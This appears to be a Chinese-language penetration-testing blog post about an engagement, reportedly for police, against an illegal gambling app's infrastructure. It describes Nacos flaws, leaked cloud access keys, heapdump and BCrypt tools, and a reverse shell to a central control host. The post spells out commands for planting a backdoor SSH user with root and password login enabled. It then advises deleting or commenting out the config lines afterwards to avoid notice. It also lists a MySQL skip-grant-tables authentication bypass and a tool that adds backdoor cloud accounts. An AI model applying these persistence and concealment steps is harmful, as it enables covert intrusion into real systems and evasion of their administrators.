微信公众号:[小白渗透成长之路]
弱小和无知不是生存的障碍,傲慢才是!
[如果你觉得文章对你有帮助,欢迎点赞]
简介信息收集信息收集扩展nacos中的短信平台nocos中的数据库总控制主机信息收集 后记
这个项目是疫情期间接的一个ga的案源,之前打完后就交给ga取证了,现在应该是差不多了,这里也算简单总结分享吧(打码比较严重,请谅解),为2022年划个句号吧。
当时接到三个链接,一个是引流,一个是app下载链接,一个是跳转链接,常规信息收集后并无发现,所以将app下载下来了。
这个app我相信大家也见过,和QQ一样,里面可以添加好友创建群,发动态等等,看着挺正规的,其实里面内嵌了一个bc网站。
下载地址:
https://www.52pojie.cn/forum.php?mod=viewthread&tid=1719157&highlight=sunny
项目地址:https://github.com/wyzxxz/heapdump_tool
nacos漏洞:
https://blog.csdn.net/qq_44159028/article/details/114022477
其实到这里主机权限已经是有了,接下来只需要收集网站信息及其用户信息了。
在nacos中通过翻找,搞到一个短信发送平台。
还是在nacos的配置文件中发现,每个ip基本都配置了nacos平台,且都存在任意用户添加漏洞,通过添加用户后找到各自的数据库配置信息。
1、添加用户
adduser m9
2、设置xxxx用户密码
passwd m9
3、设置xxxx用户登录ssh
/etc/ssh/sshd_config
添加如下代码到sshd_config中AllowUsers m9
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ClientAliveInterval 120
ClientAliveCountMax 720
4、重启ssh服务即可生效
service sshd restart
注:
在生效后可以将添加在sshd_config里面的代码进行删除或者使用#注释,达到掩人耳目的作用
接着我进行利用阿里云key工具对accesskey获取的主机进行查看,发现其中一个key的主机列表中存在一个名字为zongkongzhi的主机,感觉应该是总后台,反弹shell进行信息收集。
skip-grant-tables
systemctl restart mysqld
Bcrypt密文工具下载地址:
https://gitee.com/mzq-123/picture/raw/master/Bcrypt/BCrypt-de.jar
java -jar BCrypt-en.jar
其实对于accesskey信息泄露,还有一个好用的工具。
项目地址:
https://github.com/teamssix/cf/releases
这个工具不得不说,确实强,还可以一键获取阿里云控制面板,添加后门账户。